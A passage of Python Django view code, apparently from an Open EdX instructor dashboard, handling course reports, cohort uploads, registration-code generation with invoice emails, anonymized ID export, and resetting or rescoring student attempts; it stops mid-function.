def get_students_who_may_enroll(request, course_id):
    """
    Kick off generation of a CSV file with information about students who
    may enroll in a course.

    Responds with JSON
    {"status": "... status message ..."}
    """
    course_key = CourseKey.from_string(course_id)
    query_features = ['email']
    try:
        instructor_task.api.submit_calculate_may_enroll_csv(request, course_key, query_features)
    except AlreadyRunningError:
        # A task for this report is already queued or running.
        status = _(
            "This enrollment report is currently being created."
            " To view the status of the report, see Pending Tasks below."
            " You will be able to download the report when it is complete."
        )
    else:
        status = _(
            "The enrollment report is being created. This report contains"
            " information about learners who can enroll in the course."
            " To view the status of the report, see Pending Tasks below."
        )
    return JsonResponse({"status": status})
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@require_level('staff')
def add_users_to_cohorts(request, course_id):
    """
    View method that accepts an uploaded file (using key "uploaded-file")
    containing cohort assignments for users. This method spawns a celery task
    to do the assignments, and a CSV file with results is provided via data downloads.
    """
    # NOTE(review): sibling views parse course ids with from_deprecated_string;
    # confirm from_string is intended here.
    course_key = SlashSeparatedCourseKey.from_string(course_id)

    try:
        def validator(file_storage, file_to_validate):
            """
            Verifies that the expected columns are present.
            """
            with file_storage.open(file_to_validate) as f:
                reader = unicodecsv.reader(UniversalNewlineIterator(f), encoding='utf-8')
                try:
                    fieldnames = next(reader)
                except StopIteration:
                    # Completely empty file: no header row at all.
                    fieldnames = []
                msg = None
                if "cohort" not in fieldnames:
                    msg = _("The file must contain a 'cohort' column containing cohort names.")
                elif "email" not in fieldnames and "username" not in fieldnames:
                    msg = _("The file must contain a 'username' column, an 'email' column, or both.")
                if msg:
                    raise FileValidationException(msg)

        __, filename = store_uploaded_file(
            request, 'uploaded-file', ['.csv'],
            course_and_time_based_filename_generator(course_key, "cohorts"),
            max_file_size=2000000,  # limit to 2 MB
            validator=validator
        )
        # The task will assume the default file storage.
        instructor_task.api.submit_cohort_students(request, course_key, filename)
    except (FileValidationException, PermissionDenied) as err:
        return JsonResponse({"error": unicode(err)}, status=400)

    return JsonResponse()
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_coupon_codes(request, course_id):  # pylint: disable=unused-argument
    """
    Respond with a CSV summarising all active coupons for the course.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    coupons = Coupon.objects.filter(course_id=course_key)
    # (database column, translated CSV header) pairs, in output order.
    column_specs = [
        ('code', _('Coupon Code')),
        ('course_id', _('Course Id')),
        ('percentage_discount', _('% Discount')),
        ('description', _('Description')),
        ('expiration_date', _('Expiration Date')),
        ('is_active', _('Is Active')),
        ('code_redeemed_count', _('Code Redeemed Count')),
        ('total_discounted_seats', _('Total Discounted Seats')),
        ('total_discounted_amount', _('Total Discounted Amount')),
    ]
    db_columns = [db_col for db_col, __ in column_specs]
    csv_columns = [header for __, header in column_specs]
    coupon_rows = instructor_analytics.basic.coupon_codes_features(db_columns, coupons, course_key)
    __, data_rows = instructor_analytics.csvs.format_dictlist(coupon_rows, db_columns)
    return instructor_analytics.csvs.create_csv_response('Coupons.csv', csv_columns, data_rows)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def get_enrollment_report(request, course_id):
    """
    Kick off generation of the detailed enrollment report for the course and
    report the task status as JSON.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_detailed_enrollment_features_csv(request, course_key)
    except AlreadyRunningError:
        # A report task is already queued or running for this course.
        return JsonResponse({
            "status": _("The detailed enrollment report is being created."
                        " To view the status of the report, see Pending Tasks below."
                        " You will be able to download the report when it is complete.")
        })
    return JsonResponse({
        "status": _("The detailed enrollment report is being created."
                    " To view the status of the report, see Pending Tasks below.")
    })
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_finance_admin
def get_exec_summary_report(request, course_id):
    """
    Kick off generation of the executive summary report for the course and
    report the task status as JSON.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_executive_summary_report(request, course_key)
    except AlreadyRunningError:
        # A report task is already queued or running for this course.
        return JsonResponse({
            "status": _(
                "The executive summary report is currently being created."
                " To view the status of the report, see Pending Tasks below."
                " You will be able to download the report when it is complete."
            )
        })
    return JsonResponse({
        "status": _("The executive summary report is being created."
                    " To view the status of the report, see Pending Tasks below.")
    })
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_course_survey_results(request, course_id):
    """
    Kick off generation of the survey results report for the course and
    report the task status as JSON.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    try:
        instructor_task.api.submit_course_survey_report(request, course_key)
    except AlreadyRunningError:
        # A report task is already queued or running for this course.
        return JsonResponse({
            "status": _(
                "The survey report is currently being created."
                " To view the status of the report, see Pending Tasks below."
                " You will be able to download the report when it is complete."
            )
        })
    return JsonResponse({
        "status": _("The survey report is being created."
                    " To view the status of the report, see Pending Tasks below.")
    })
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_proctored_exam_results(request, course_id):
    """
    Kick off generation of the proctored exam results report for the course
    and report the task status as JSON.
    """
    # Columns included in the generated report.
    query_features = [
        'user_email',
        'exam_name',
        'attempt_code',
        'allowed_time_limit_mins',
        'is_sample_attempt',
        'started_at',
        'completed_at',
        'status',
    ]
    course_key = CourseKey.from_string(course_id)
    try:
        instructor_task.api.submit_proctored_exam_results_report(request, course_key, query_features)
    except AlreadyRunningError:
        # A report task is already queued or running for this course.
        return JsonResponse({
            "status": _(
                "The proctored exam results report is currently being created."
                " To view the status of the report, see Pending Tasks below."
                " You will be able to download the report when it is complete."
            )
        })
    return JsonResponse({
        "status": _("The proctored exam results report is being created."
                    " To view the status of the report, see Pending Tasks below.")
    })
def save_registration_code(user, course_id, mode_slug, invoice=None, order=None, invoice_item=None):
    """
    Generate a new registration code and save it in the Course Registration
    table, retrying with a fresh code whenever the generated one collides
    with an active coupon or an existing registration code.

    Args:
        user (User): The user creating the course registration codes.
        course_id (str): The string representation of the course ID.
        mode_slug (str): The Course Mode Slug associated with any enrollment made by these codes.
        invoice (Invoice): (Optional) The associated invoice for this code.
        order (Order): (Optional) The associated order for this code.
        invoice_item (CourseRegistrationCodeInvoiceItem) : (Optional) The associated CourseRegistrationCodeInvoiceItem

    Returns:
        The newly created CourseRegistrationCode.
    """
    # Loop rather than recurse (as this previously did) so that an unlucky
    # streak of collisions cannot exhaust the interpreter's recursion limit.
    while True:
        code = random_code_generator()

        # Reject codes already claimed by an active coupon.
        if Coupon.objects.filter(code=code, is_active=True).exists():
            continue

        course_registration = CourseRegistrationCode(
            code=code,
            course_id=unicode(course_id),
            created_by=user,
            invoice=invoice,
            order=order,
            mode_slug=mode_slug,
            invoice_item=invoice_item
        )
        try:
            # Atomic block so a duplicate-code IntegrityError leaves no
            # partial state behind before we retry with a new code.
            with transaction.atomic():
                course_registration.save()
            return course_registration
        except IntegrityError:
            continue
def registration_codes_csv(file_name, codes_list, csv_type=None):
    """
    Build a CSV response (header plus data rows) for a list of registration
    codes.

    :param file_name: name for the downloaded CSV file
    :param codes_list: the registration codes to serialise
    :param csv_type: report flavour passed through to the feature extractor
    """
    # Column order for the CSV output.
    query_features = [
        'code', 'redeem_code_url', 'course_id', 'company_name', 'created_by',
        'redeemed_by', 'invoice_id', 'purchaser', 'customer_reference_number', 'internal_reference', 'is_valid'
    ]
    rows = instructor_analytics.basic.course_registration_features(query_features, codes_list, csv_type)
    header, data_rows = instructor_analytics.csvs.format_dictlist(rows, query_features)
    return instructor_analytics.csvs.create_csv_response(file_name, header, data_rows)
def random_code_generator():
    """
    Produce a random alphanumeric code whose length comes from the
    REGISTRATION_CODE_LENGTH setting (default 8).
    """
    return generate_random_string(getattr(settings, 'REGISTRATION_CODE_LENGTH', 8))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def get_registration_codes(request, course_id):
    """
    Respond with a CSV summarising all registration codes for the course,
    optionally filtered by the purchasing company.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # All registration codes for the course, grouped by company.
    codes = CourseRegistrationCode.objects.filter(
        course_id=course_key
    ).order_by('invoice_item__invoice__company_name')

    company_name = request.POST['download_company_name']
    if company_name:
        codes = codes.filter(invoice_item__invoice__company_name=company_name)

    return registration_codes_csv("Registration_Codes.csv", codes, 'download')
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_sales_admin
@require_POST
def generate_registration_codes(request, course_id):
    """
    Respond with csv which contains a summary of all Generated Codes.

    Creates an Invoice and a CourseRegistrationCodeInvoiceItem for the sale,
    generates the requested number of registration codes, emails each
    recipient an invoice (with the codes attached as CSV and, when available,
    a PDF invoice), and finally returns the generated codes as a CSV download.
    """
    course_id = CourseKey.from_string(course_id)
    invoice_copy = False

    # covert the course registration code number into integer
    try:
        course_code_number = int(request.POST['total_registration_codes'])
    except ValueError:
        # Fall back for values submitted as floats, e.g. "25.0".
        course_code_number = int(float(request.POST['total_registration_codes']))

    # Sale / company details come straight from the form POST.
    company_name = request.POST['company_name']
    company_contact_name = request.POST['company_contact_name']
    company_contact_email = request.POST['company_contact_email']
    unit_price = request.POST['unit_price']

    try:
        # Normalize the price to two decimal places, truncating toward zero.
        unit_price = (
            decimal.Decimal(unit_price)
        ).quantize(
            decimal.Decimal('.01'),
            rounding=decimal.ROUND_DOWN
        )
    except decimal.InvalidOperation:
        return HttpResponse(
            status=400,
            content=_(u"Could not parse amount as a decimal")
        )

    recipient_name = request.POST['recipient_name']
    recipient_email = request.POST['recipient_email']
    address_line_1 = request.POST['address_line_1']
    address_line_2 = request.POST['address_line_2']
    address_line_3 = request.POST['address_line_3']
    city = request.POST['city']
    state = request.POST['state']
    zip_code = request.POST['zip']
    country = request.POST['country']
    internal_reference = request.POST['internal_reference']
    customer_reference_number = request.POST['customer_reference_number']
    recipient_list = [recipient_email]
    if request.POST.get('invoice', False):
        # Requesting user asked for a copy of the invoice email.
        recipient_list.append(request.user.email)
        invoice_copy = True
    sale_price = unit_price * course_code_number
    # Remember the user's invoice-copy preference for next time.
    set_user_preference(request.user, INVOICE_KEY, invoice_copy)
    sale_invoice = Invoice.objects.create(
        total_amount=sale_price,
        company_name=company_name,
        company_contact_email=company_contact_email,
        company_contact_name=company_contact_name,
        course_id=course_id,
        recipient_name=recipient_name,
        recipient_email=recipient_email,
        address_line_1=address_line_1,
        address_line_2=address_line_2,
        address_line_3=address_line_3,
        city=city,
        state=state,
        zip=zip_code,
        country=country,
        internal_reference=internal_reference,
        customer_reference_number=customer_reference_number
    )

    # One invoice line item covers the whole batch of codes.
    invoice_item = CourseRegistrationCodeInvoiceItem.objects.create(
        invoice=sale_invoice,
        qty=course_code_number,
        unit_price=unit_price,
        course_id=course_id
    )

    course = get_course_by_id(course_id, depth=0)
    paid_modes = CourseMode.paid_modes_for_course(course_id)

    # Registration codes only make sense for a course with exactly one paid mode.
    if len(paid_modes) != 1:
        msg = (
            u"Generating Code Redeem Codes for Course '{course_id}', which must have a single paid course mode. "
            u"This is a configuration issue. Current course modes with payment options: {paid_modes}"
        ).format(course_id=course_id, paid_modes=paid_modes)
        log.error(msg)
        return HttpResponse(
            status=500,
            content=_(u"Unable to generate redeem codes because of course misconfiguration.")
        )

    course_mode = paid_modes[0]
    course_price = course_mode.min_price

    registration_codes = []
    for __ in range(course_code_number):
        generated_registration_code = save_registration_code(
            request.user, course_id, course_mode.slug, invoice=sale_invoice, order=None, invoice_item=invoice_item
        )
        registration_codes.append(generated_registration_code)

    site_name = microsite.get_value('SITE_NAME', 'localhost')
    quantity = course_code_number
    # Discount relative to the course's list price across the whole batch.
    discount = (float(quantity * course_price) - float(sale_price))
    course_url = '{base_url}{course_about}'.format(
        base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
        course_about=reverse('about_course', kwargs={'course_id': course_id.to_deprecated_string()})
    )
    dashboard_url = '{base_url}{dashboard}'.format(
        base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
        dashboard=reverse('dashboard')
    )

    try:
        pdf_file = sale_invoice.generate_pdf_invoice(course, course_price, int(quantity), float(sale_price))
    except Exception:  # pylint: disable=broad-except
        # PDF generation is best-effort; a plain-text notice is attached instead below.
        log.exception('Exception at creating pdf file.')
        pdf_file = None

    from_address = theming_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
    # Template context shared by the email body and the invoice attachment.
    context = {
        'invoice': sale_invoice,
        'site_name': site_name,
        'course': course,
        'course_price': course_price,
        'sub_total': course_price * quantity,
        'discount': discount,
        'sale_price': sale_price,
        'quantity': quantity,
        'registration_codes': registration_codes,
        'currency_symbol': settings.PAID_COURSE_REGISTRATION_CURRENCY[1],
        'course_url': course_url,
        'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
        'dashboard_url': dashboard_url,
        'contact_email': from_address,
        'corp_address': microsite.get_value('invoice_corp_address', settings.INVOICE_CORP_ADDRESS),
        'payment_instructions': microsite.get_value('invoice_payment_instructions', settings. INVOICE_PAYMENT_INSTRUCTIONS),
        'date': time.strftime("%m/%d/%Y")
    }
    # composes registration codes invoice email
    subject = u'Confirmation and Invoice for {course_name}'.format(course_name=course.display_name)
    message = render_to_string('emails/registration_codes_sale_email.txt', context)
    invoice_attachment = render_to_string('emails/registration_codes_sale_invoice_attachment.txt', context)

    #send_mail(subject, message, from_address, recipient_list, fail_silently=False)
    # Build the CSV attachment of (code, redemption URL) pairs.
    csv_file = StringIO.StringIO()
    csv_writer = csv.writer(csv_file)
    for registration_code in registration_codes:
        full_redeem_code_url = 'http://{base_url}{redeem_code_url}'.format(
            base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
            redeem_code_url=reverse('register_code_redemption', kwargs={'registration_code': registration_code.code})
        )
        csv_writer.writerow([registration_code.code, full_redeem_code_url])

    finance_email = microsite.get_value('finance_email', settings.FINANCE_EMAIL)
    if finance_email:
        # append the finance email into the recipient_list
        recipient_list.append(finance_email)

    # send a unique email for each recipient, don't put all email addresses in a single email
    for recipient in recipient_list:
        email = EmailMessage()
        email.subject = subject
        email.body = message
        email.from_email = from_address
        email.to = [recipient]
        email.attach(u'RegistrationCodes.csv', csv_file.getvalue(), 'text/csv')
        email.attach(u'Invoice.txt', invoice_attachment, 'text/plain')
        if pdf_file is not None:
            email.attach(u'Invoice.pdf', pdf_file.getvalue(), 'application/pdf')
        else:
            # PDF generation failed earlier; attach an explanatory note instead.
            file_buffer = StringIO.StringIO(_('pdf download unavailable right now, please contact support.'))
            email.attach(u'pdf_unavailable.txt', file_buffer.getvalue(), 'text/plain')
        email.send()

    return registration_codes_csv("Registration_Codes.csv", registration_codes)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def active_registration_codes(request, course_id):
    """
    Respond with a CSV of registration codes that have not yet been redeemed.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # Start from every code generated for this course.
    codes = CourseRegistrationCode.objects.filter(
        course_id=course_key
    ).order_by('invoice_item__invoice__company_name')
    company_name = request.POST['active_company_name']
    if company_name:
        codes = codes.filter(invoice_item__invoice__company_name=company_name)
    # Drop any code that already has a redemption record.
    redemptions = RegistrationCodeRedemption.objects.select_related(
        'registration_code', 'registration_code__invoice_item__invoice'
    ).filter(registration_code__course_id=course_key)
    if redemptions.exists():
        redeemed = [redemption.registration_code.code for redemption in redemptions]
        codes = codes.exclude(code__in=redeemed)
    return registration_codes_csv("Active_Registration_Codes.csv", codes)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_POST
def spent_registration_codes(request, course_id):
    """
    Respond with csv which contains a summary of all Spent(used) Registration Codes.

    Optionally narrows the report to one company via the 'spent_company_name'
    POST field.
    """
    course_id = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # find the redeemed registration codes if any exist in the db
    code_redemption_set = RegistrationCodeRedemption.objects.select_related('registration_code').filter(
        registration_code__course_id=course_id
    )
    # Start with an empty *queryset* (not a plain list) so that the
    # company-name filter below cannot raise AttributeError when the course
    # has no redemptions yet.
    spent_codes_list = CourseRegistrationCode.objects.none()
    if code_redemption_set.exists():
        redeemed_registration_codes = [code.registration_code.code for code in code_redemption_set]
        # Resolve the redeemed code strings back to their full records.
        spent_codes_list = CourseRegistrationCode.objects.filter(
            course_id=course_id, code__in=redeemed_registration_codes
        ).order_by('invoice_item__invoice__company_name').select_related('invoice_item__invoice')
    company_name = request.POST['spent_company_name']
    if company_name:
        spent_codes_list = spent_codes_list.filter(invoice_item__invoice__company_name=company_name)
    csv_type = 'spent'
    return registration_codes_csv("Spent_Registration_Codes.csv", spent_codes_list, csv_type)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def get_anon_ids(request, course_id):  # pylint: disable=unused-argument
    """
    Respond with 2-column CSV output of user-id, anonymized-user-id
    """
    # TODO: the User.objects query and CSV generation here could be
    # centralized into instructor_analytics. Currently instructor_analytics
    # has similar functionality but not quite what's needed.
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)

    def build_csv_response(filename, header, rows):
        """Return a CSV HttpResponse (excel dialect, utf-8 encoded cells)."""
        response = HttpResponse(content_type='text/csv')
        response['Content-Disposition'] = 'attachment; filename={0}'.format(unicode(filename).encode('utf-8'))
        writer = csv.writer(response, dialect='excel', quotechar='"', quoting=csv.QUOTE_ALL)
        # The data should be plain ascii in practice, but encode defensively.
        writer.writerow([unicode(cell).encode('utf-8') for cell in header])
        for row in rows:
            writer.writerow([unicode(cell).encode('utf-8') for cell in row])
        return response

    enrolled_students = User.objects.filter(
        courseenrollment__course_id=course_key,
    ).order_by('id')
    header = ['User ID', 'Anonymized User ID', 'Course Specific Anonymized User ID']
    rows = []
    for student in enrolled_students:
        rows.append([
            student.id,
            unique_id_for_user(student, save=False),
            anonymous_id_for_user(student, course_key, save=False),
        ])
    filename = course_key.to_deprecated_string().replace('/', '-') + '-anon-ids.csv'
    return build_csv_response(filename, header, rows)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@common_exceptions_400
@require_level('staff')
@require_post_params(
    unique_student_identifier="email or username of student for whom to get progress url"
)
def get_student_progress_url(request, course_id):
    """
    Return the LMS progress-page URL for a single student.

    Limited to staff access. Takes the POST parameter
    unique_student_identifier and, if the student exists, responds with
    e.g. {'progress_url': '/../...'}
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    student = get_student_from_identifier(request.POST.get('unique_student_identifier'))
    progress_url = reverse(
        'student_progress',
        kwargs={'course_id': course_key.to_deprecated_string(), 'student_id': student.id},
    )
    return JsonResponse({
        'course_id': course_key.to_deprecated_string(),
        'progress_url': progress_url,
    })
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@require_post_params(
    problem_to_reset="problem urlname to reset"
)
@common_exceptions_400
def reset_student_attempts(request, course_id):
    """
    Reset a student's attempt counter for a problem, or start a task to reset
    it for every student; optionally delete the student's module state.

    Limited to staff access; some combinations require instructor access.
    POST parameters:
      - problem_to_reset: urlname of the problem
      - unique_student_identifier: email or username (optional)
      - all_students: boolean; requires instructor access and is mutually
        exclusive with both unique_student_identifier and delete_module
      - delete_module: boolean; requires instructor access and is mutually
        exclusive with all_students
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'staff', course_key, depth=None
    )
    problem_to_reset = strip_if_string(request.POST.get('problem_to_reset'))
    student_identifier = request.POST.get('unique_student_identifier', None)
    student = get_student_from_identifier(student_identifier) if student_identifier is not None else None
    all_students = request.POST.get('all_students', False) in ['true', 'True', True]
    delete_module = request.POST.get('delete_module', False) in ['true', 'True', True]

    # Reject invalid parameter combinations up front.
    if all_students and student:
        return HttpResponseBadRequest(
            "all_students and unique_student_identifier are mutually exclusive."
        )
    if all_students and delete_module:
        return HttpResponseBadRequest(
            "all_students and delete_module are mutually exclusive."
        )

    # Bulk resets and state deletion are instructor-only operations.
    if (all_students or delete_module) and not has_access(request.user, 'instructor', course):
        return HttpResponseForbidden("Requires instructor access.")

    try:
        module_state_key = course_key.make_usage_key_from_deprecated_string(problem_to_reset)
    except InvalidKeyError:
        return HttpResponseBadRequest()

    response_payload = {'problem_to_reset': problem_to_reset}
    if student:
        try:
            enrollment.reset_student_attempts(
                course_key,
                student,
                module_state_key,
                requesting_user=request.user,
                delete_module=delete_module
            )
        except StudentModule.DoesNotExist:
            return HttpResponseBadRequest(_("Module does not exist."))
        except sub_api.SubmissionError:
            # Trust the submissions API to log the error
            return HttpResponse(_("An error occurred while deleting the score."), status=500)
        response_payload['student'] = student_identifier
    elif all_students:
        instructor_task.api.submit_reset_problem_attempts_for_all_students(request, module_state_key)
        response_payload['task'] = 'created'
        response_payload['student'] = 'All Students'
    else:
        return HttpResponseBadRequest()

    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
@common_exceptions_400
def reset_student_attempts_for_entrance_exam(request, course_id):  # pylint: disable=invalid-name
    """
    Reset a student's entrance-exam attempt counters, or start a task to do
    so for every student; optionally delete the student's entrance-exam state.

    Limited to staff access; some combinations require instructor access.
    POST parameters:
      - unique_student_identifier: email or username (optional)
      - all_students: boolean; requires instructor access, mutually
        exclusive with delete_module
      - delete_module: boolean; requires instructor access, mutually
        exclusive with all_students
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'staff', course_key, depth=None
    )
    if not course.entrance_exam_id:
        return HttpResponseBadRequest(
            _("Course has no entrance exam section.")
        )

    student_identifier = request.POST.get('unique_student_identifier', None)
    student = get_student_from_identifier(student_identifier) if student_identifier is not None else None
    all_students = request.POST.get('all_students', False) in ['true', 'True', True]
    delete_module = request.POST.get('delete_module', False) in ['true', 'True', True]

    # Reject invalid parameter combinations up front.
    if all_students and student:
        return HttpResponseBadRequest(
            _("all_students and unique_student_identifier are mutually exclusive.")
        )
    if all_students and delete_module:
        return HttpResponseBadRequest(
            _("all_students and delete_module are mutually exclusive.")
        )

    # Bulk resets and state deletion are instructor-only operations.
    if (all_students or delete_module) and not has_access(request.user, 'instructor', course):
        return HttpResponseForbidden(_("Requires instructor access."))

    try:
        entrance_exam_key = course_key.make_usage_key_from_deprecated_string(course.entrance_exam_id)
        if delete_module:
            instructor_task.api.submit_delete_entrance_exam_state_for_student(request, entrance_exam_key, student)
        else:
            instructor_task.api.submit_reset_problem_attempts_in_entrance_exam(request, entrance_exam_key, student)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam section."))

    return JsonResponse({'student': student_identifier or _('All Students'), 'task': 'created'})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@require_post_params(problem_to_reset="problem urlname to reset")
@common_exceptions_400
def rescore_problem(request, course_id):
    """
    Start a background rescore of a problem for one student or for all.

    Limited to instructor access.
    POST parameters:
      - problem_to_reset: urlname of the problem
      - unique_student_identifier: email or username (optional)
      - all_students: boolean
    all_students and unique_student_identifier cannot both be present.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    problem_to_reset = strip_if_string(request.POST.get('problem_to_reset'))
    student_identifier = request.POST.get('unique_student_identifier', None)
    student = get_student_from_identifier(student_identifier) if student_identifier is not None else None
    all_students = request.POST.get('all_students') in ['true', 'True', True]

    if not (problem_to_reset and (all_students or student)):
        return HttpResponseBadRequest("Missing query parameters.")
    if all_students and student:
        return HttpResponseBadRequest(
            "Cannot rescore with all_students and unique_student_identifier."
        )

    try:
        module_state_key = course_key.make_usage_key_from_deprecated_string(problem_to_reset)
    except InvalidKeyError:
        return HttpResponseBadRequest("Unable to parse problem id")

    response_payload = {'problem_to_reset': problem_to_reset}
    if student:
        response_payload['student'] = student_identifier
        instructor_task.api.submit_rescore_problem_for_student(request, module_state_key, student)
        response_payload['task'] = 'created'
    elif all_students:
        instructor_task.api.submit_rescore_problem_for_all_students(request, module_state_key)
        response_payload['task'] = 'created'
    else:
        return HttpResponseBadRequest()

    return JsonResponse(response_payload)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('instructor')
@common_exceptions_400
def rescore_entrance_exam(request, course_id):
    """
    Start a background rescore of the entrance exam for one student or all.

    Limited to instructor access.
    POST parameters:
      - unique_student_identifier: email or username (optional)
      - all_students: boolean
    all_students and unique_student_identifier cannot both be present.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_with_access(
        request.user, 'staff', course_key, depth=None
    )
    student_identifier = request.POST.get('unique_student_identifier', None)
    student = get_student_from_identifier(student_identifier) if student_identifier is not None else None
    all_students = request.POST.get('all_students') in ['true', 'True', True]

    if not course.entrance_exam_id:
        return HttpResponseBadRequest(
            _("Course has no entrance exam section.")
        )
    if all_students and student:
        return HttpResponseBadRequest(
            _("Cannot rescore with all_students and unique_student_identifier.")
        )

    try:
        entrance_exam_key = course_key.make_usage_key_from_deprecated_string(course.entrance_exam_id)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam section."))

    response_payload = {}
    response_payload['student'] = student_identifier if student else _("All Students")
    instructor_task.api.submit_rescore_entrance_exam_for_student(request, entrance_exam_key, student)
    response_payload['task'] = 'created'
    return JsonResponse(response_payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_background_email_tasks(request, course_id):  # pylint: disable=unused-argument
    """
    List the bulk-email tasks that have run for this course.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # Restrict the task history to bulk-email tasks only.
    tasks = instructor_task.api.get_instructor_task_history(course_key, task_type='bulk_course_email')
    return JsonResponse({
        'tasks': map(extract_task_features, tasks),
    })
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_email_content(request, course_id):  # pylint: disable=unused-argument
    """
    List the content of bulk emails that have been sent for this course.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    # The bulk-email task history doubles as the record of sent emails.
    emails = instructor_task.api.get_instructor_task_history(course_key, task_type='bulk_course_email')
    return JsonResponse({
        'emails': map(extract_email_features, emails),
    })
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_instructor_tasks(request, course_id):
    """
    List instructor tasks.

    Optional POST parameters:
    - with no arguments, lists currently running tasks
    - `problem_location_str` lists task history for that problem
    - `problem_location_str` + `unique_student_identifier` lists task
      history for that problem AND that student (intersection)
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    problem_location_str = strip_if_string(request.POST.get('problem_location_str', False))
    student = request.POST.get('unique_student_identifier', None)
    if student is not None:
        student = get_student_from_identifier(student)

    if student and not problem_location_str:
        return HttpResponseBadRequest(
            "unique_student_identifier must accompany problem_location_str"
        )

    if not problem_location_str:
        # No problem given: report the currently running tasks.
        tasks = instructor_task.api.get_running_instructor_tasks(course_key)
    else:
        try:
            module_state_key = course_key.make_usage_key_from_deprecated_string(problem_location_str)
        except InvalidKeyError:
            return HttpResponseBadRequest()
        if student:
            # History of this problem restricted to the one student.
            tasks = instructor_task.api.get_instructor_task_history(course_key, module_state_key, student)
        else:
            # History of this problem across all students.
            tasks = instructor_task.api.get_instructor_task_history(course_key, module_state_key)

    return JsonResponse({
        'tasks': map(extract_task_features, tasks),
    })
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_entrance_exam_instructor_tasks(request, course_id):  # pylint: disable=invalid-name
    """
    List entrance-exam-related instructor tasks.

    Optional POST parameter:
      - unique_student_identifier: email or username; restricts the history
        to that single student.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    course = get_course_by_id(course_key)
    student = request.POST.get('unique_student_identifier', None)
    if student is not None:
        student = get_student_from_identifier(student)

    try:
        entrance_exam_key = course_key.make_usage_key_from_deprecated_string(course.entrance_exam_id)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam section."))

    if student:
        # History restricted to one student's entrance exam.
        tasks = instructor_task.api.get_entrance_exam_instructor_task_history(course_key, entrance_exam_key, student)
    else:
        # History across all students.
        tasks = instructor_task.api.get_entrance_exam_instructor_task_history(course_key, entrance_exam_key)

    return JsonResponse({
        'tasks': map(extract_task_features, tasks),
    })
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_level('staff')
def list_report_downloads(_request, course_id):
    """
    List the grade CSV files available for download for this course.
    """
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)
    report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
    downloads = []
    for name, url in report_store.links_for(course_key):
        downloads.append(dict(
            name=name,
            url=url,
